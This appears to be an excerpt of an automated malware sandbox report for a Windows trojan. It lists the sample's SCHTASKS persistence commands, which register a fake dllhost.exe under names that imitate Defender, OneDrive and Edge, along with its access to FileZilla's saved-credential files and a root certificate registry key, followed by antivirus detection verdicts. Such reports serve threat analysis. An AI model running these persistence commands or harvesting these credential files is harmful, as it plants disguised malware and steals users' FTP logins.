cmdline | SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\Dllhost\dllhost.exe" | ||||||||
cmdline | SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\Dllhost\dllhost.exe" | ||||||||
cmdline | "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\Dllhost\dllhost.exe" | ||||||||
cmdline | SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\Dllhost\dllhost.exe" | ||||||||
cmdline | "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\Dllhost\dllhost.exe" | ||||||||
cmdline | "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "SettingSysHost\SettingSysHostService_bk4940" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
file | C:\Users\test22\AppData\Roaming\FileZilla\sitemanager.xml |
file | C:\Users\test22\AppData\Roaming\FileZilla\recentservers.xml |
Cynet | Malicious (score: 100) |
Cylance | Unsafe |
Sangfor | Trojan.Win32.Save.a |
Cybereason | malicious.3b6a84 |
Symantec | ML.Attribute.HighConfidence |
Elastic | malicious (high confidence) |
APEX | Malicious |
FireEye | Generic.mg.60f0517dccdde6f0 |
Rising | Malware.Obfus/MSIL@AI.86 (RDM.MSIL2:fyKXE+SwjGKsf+52yy/WEg) |
SentinelOne | Static AI - Suspicious PE |
MaxSecure | Trojan.Malware.300983.susgen |
CrowdStrike | win/malicious_confidence_100% (D) |
registry | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F81F111D0E5AB58D396F7BF525577FD30FDC95AA\Blob |